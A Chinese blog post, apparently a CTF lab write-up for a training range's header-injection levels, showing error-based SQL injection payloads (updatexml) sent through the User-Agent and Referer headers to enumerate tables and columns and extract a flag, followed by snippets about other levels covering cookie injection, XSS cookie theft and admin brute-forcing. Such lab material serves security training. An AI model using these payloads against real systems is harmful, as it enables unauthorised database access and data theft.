封神台 head注入1-3

最新推荐文章于 2022-10-17 23:15:14 发布
最新推荐文章于 2022-10-17 23:15:14 发布
阅读量285 收藏
点赞数
分类专栏: 封神台靶场 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46578840/article/details/118213433
版权

在这里插入图片描述可以看到源代码只是对name和password做了过滤,但是全局变量user-agent是可控的

 bp抓包修改user-agent头
 1' and extaclvalue(1,concat(0x7e,(select database()),1)) and '
 1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),1),'2') # ' //爆表,由于使用extaclualue会被拒绝执行,还是用会updatexml吧
 1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='head_error' and table_name='flag_head' limit 0,1)),1),'2') # ' //列名
1' and updatexml(1,concat(0x7e,(select flag_h1 from flag_head limit 0,1)),1),'2') # ' //字段

在这里插入图片描述在这里插入图片描述

第二关和第三关根据源码换成Referer头即可,payload一样

星星明亮
关注
专栏目录
神台SQL注入-header注入
qq_40941912的博客
08-25 733
一、原理 数据路径出现符号是会爆错的 全局变量: $_REQUEST (获取GET/POST/COOKIE) COOKIE在新版本已经无法获取了 $_POST (获取POST传参) $_GET (获取GET的传参) $_COOKIE (获取COOKIE的值) $_SERVER (包含了诸如头信息(header)、路径(path)、以及脚本位置(script locations)等等信息的数组) **$_SERVER()**它包含着诸多的信息,有头信息(heander),路径(path),脚本位置
神台SQL注入-基础靶场1-Head注入
原味瓜子、的博客
10-10 1132
1111
CTF神台第三关通关
weixin_49071539的博客
11-25 996
分析代码 ① 从请求头中拿到Referer,并赋值给ComeUrl。 ② 判断ComeUrl是否为空,若是空,则表明是直接输入地址访问。本题不允许 ③ ComeUrl不为空, 读取Host,并在前面拼接 http:// 赋值给cUrl,如果ComeUrl有 " : ",表明有端口号,在为cUrl 加上端口号。 步骤: 1.第二章admin是假后台 2.通过御剑扫描发现还存在一个admin123后台 3.利用第二章的密码可以进入后台 4.打开burp suite,后台点击左侧任意选项 5.查看 burp su
ctf实战 掌控安全的靶场 第三关通关记录
wh1te 小白的博客
09-20 3486
掌控安全神台第三关  根据题目可能要用burp进行抓包,点击传送门进入题目主页 之前题目说的扫描到新的后台地址admin123 在网址后加入admin123 进入新的后台管理页面 根据第二关得到的用户和密码进行登录  进入后得到这样一个页面 抓包结果如下 根据代码分析只需要修改host和referer的ip地址 修改以后结果还是进不去 分析一下问题  打开F...
神台靶场-第三章
Mr_helloword的博客
07-12 2291
第三章:爆破管理员账户登录后台 使用工具:御剑后台扫描,burpsuit 进入网站后想进入管理后台页面,试着在url地址后加/admin常试结果成功了,如果不成功再用工具扫描如下: 登陆后台后使用bp暴力破解模块爆破账户密码(这里我们知道账号密码就不具体演示了): 3.使用bp修改数量价格 flag ...
神台SQL注入-延时注入
qq_40941912的博客
10-05 410
一、原理 所谓的盲注就是在服务器没有错误回显的时候完成的注入攻击。 服务器没有错误回显,对于攻击者来说缺少了非常重要的“调试信息”。 相关函数 length() => 返回(字符串)长度的数值 substr([],[A],[B]) => 返回[]值中,[A]开始[B]位后的字符值 ascii() => 通过数值返回(此处内容)的阿斯克码 sleep() if(expr1.expr2,expr3) =>判断语句,第一个正确执行2,错误执行3 二、作业 (一) SQL注入-延时盲注 R
神台sql注入---第一章节: 为了女神小芳
qq_52573109的博客
09-14 809
1:靶场链接: https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7 2:解题过程: (1):打开传送门,点击"点击查看新闻"发现url出现参数 id = 1,猜测为注入点。 (2):判断字段个数: 注入代码: order by 2 ...
神台SQL注入-基础靶场1-布尔盲注
原味瓜子、的博客
10-09 1615
1
神台 第三章 为了更多的权限,留言板!(Cookie)
最新发布
m0_65712192的博客
10-17 656
神台 第三章 为了更多的权限,留言板!(Cookie)
神台----尤里的复仇I-第三章:这个后台能识别登录者…
正在学习的路上...
07-18 1930
根据提示,真正的后台地址为admin123,输入上一关的账号、密码进去。 分析代码: 从请求头中拿到Referer,并赋值给ComeUrl。 判断ComeUrl是否为空,若是空,则表明是直接输入地址访问。本题不允许 ComeUrl不为空, 读取Host,并在前面拼接 http:// 赋值给cUrl,如果ComeUrl有 " : ",表明有端口号,在为cUrl 加上端口号。 最后判断cUrl和...
登录别人的账户(仅在神台靶场).mp4
04-07
这个教程仅在神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
神台——训练营0基础学渗透测试
sparename的博客
08-06 257
神台-掌控安全在线演练靶场SQL注入实战靶场【4题】SQL注入实战靶场——基础靶场1SQL注入实战靶场——基础靶场2SQL注入实战靶场——基础靶场3SQL注入实战靶场——基础靶场4盲注 - 没有回显情况下SQL注入【3题】SQL盲注——靶场1SQL盲注——靶场2SQL盲注——靶场3HEAD注入 - 另类传参方式SQL注入【3题】HEAD注入 ——靶场1HEAD注入 ——靶场2HEAD注入 ——靶场3 SQL注入实战靶场【4题】 SQL注入实战靶场——基础靶场1 and 1=2 order by 3
神台XSS实验
身高两米不到的博客
03-17 1135
0x01 缘起 想象一个场景:黑客发现一个网站存在XSS漏洞,于是搭建一个XSS接收平台,只要对方网站管理员登录或者巡查就能获取到他的cookie,从而完成免密登录导致网站失陷。 最近研究在pikachu靶场xss盗取cookie,但感觉效果不好。今天打靶场恰巧遇到一个非常凸显XSS危害场景从而学习记录。 神台 - 掌控安全在线演练靶场,是一个在线黑客攻防演练平台。 0x02 排雷 这里是第三关,登入界面一看到留言板内容框,条件反射想到XSS,弹窗尝试发现确实存在XSS漏洞。 但到这里,经
神台 第三章:为了更多的权限!留言板!【配套课时:cookie伪造目标权限 实战演练】
06-14 2637
题目 Tips: 1、存储型Xss 2、flag在cookie里,格式为zkz{..},xss bot 每10秒访问一次页面 3、自建Xss平台源码:http://www.zkaq.org/?t/99.html 经过一番操作,尤里虽然进入到后台,窃窃自喜的他不满足于此,作为黑阔他要挑战曾经的自己,他要攻克之前失手的网站! 他重新浏览之前的网站,这时他突然发现了一个留言板功能。而留言板管理员是每天都会去查阅的。 尤里开始动手…… 1.进入留言的页面,测试弹窗 发现弹框显示1,注入点为主题 ...
神台第二关
weixin_44106116的博客
11-21 2238
1第一种方法 1 查看是否能够SQL注入 点开第一个新闻,用and 1=1 查看是否存在SQL注入,发现弹出禁用参数对话框 再使用order by ,查看共有几个字段,发现order by 可以用,共十个 因为网页的防护,一般只拦截GET和POST,忽略了cookie也可以传参。所以尝试cookie注入 1.1附加知识点 cookie 类型为“小型文本文件”,是网站给客户端的身份证,由客户端暂时或...
神台-第三章 爆破管理员账户登录后台
ploto_cs的博客
09-26 2867
神台-第三章 爆破管理员账户登录后台 1.探测真实登录网址 有题目可知,8004端口下admin是假后台,故使用御剑探测8004端口 2.探测可得,admin123才是真后台 3.使用上一章节爆破出的密码继续登录 账户:admin 密码:welcome 成功登录后可得 4.分析代码 ① 从请求头中拿到Referer,并赋值给ComeUrl。 ② 判断ComeUrl是否为空,若是空,则表明是直接输入地址访问。本题不允许 ③ ComeUrl不为空, 读取Host,并在前面拼接 http:// 赋值给cU
ctf实战 神台的靶场 第四关通关记录
weixin_30437847的博客
05-28 1192
发现留言板功能,顺手试下反射型xss代码,结果成功的弹窗了 网上的xss平台:http://xsspt.com,需要自己去注册和登录,反正账号密码知道就行了,邮箱反正不验证不建议写真实的。 我们先建立项目,名称什么乱选都行,就是选择模块的时候记得选取这两个 然后你可以看到一叠代码,这个就是两个模块中的XSS Payload。把生成的存储型xss链接放入留言板提交成功后到xss平台等查...
mbp 神台靶场 一(笔记)
热门推荐
qq_43558415的博客
02-09 1万+
最近在看掌控安全的公开课,里面提到了神台靶场,因为以前也做过网易云课堂的靶场,便轻车熟路地注册了账号登陆靶场,先看了第一关。第一关是通过SQL注入找到管理员密码,打开链接,点进去一看发现有猫腻。 一、寻找注入点 看到id=1,便可以用id=1’或id=1 and 1=2来进行测试,以id=1’为例,发现网页出现了错误。 二、判断字段数 在发现这可以进行SQL注入后便要判断它的字段数,用...
"云原生数据湖体系构建之道1:神DLA实践与未来展望
神-不止于弹性-云原生数据湖体系构建之道是阿里云数据湖分析技术负责人提出的一个理论和实践方向。在这个讲述中,他详细介绍了数据湖的机遇和挑战、DLA的最佳实践、DLA应用案例和未来展望。 数据湖作为一种新兴的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值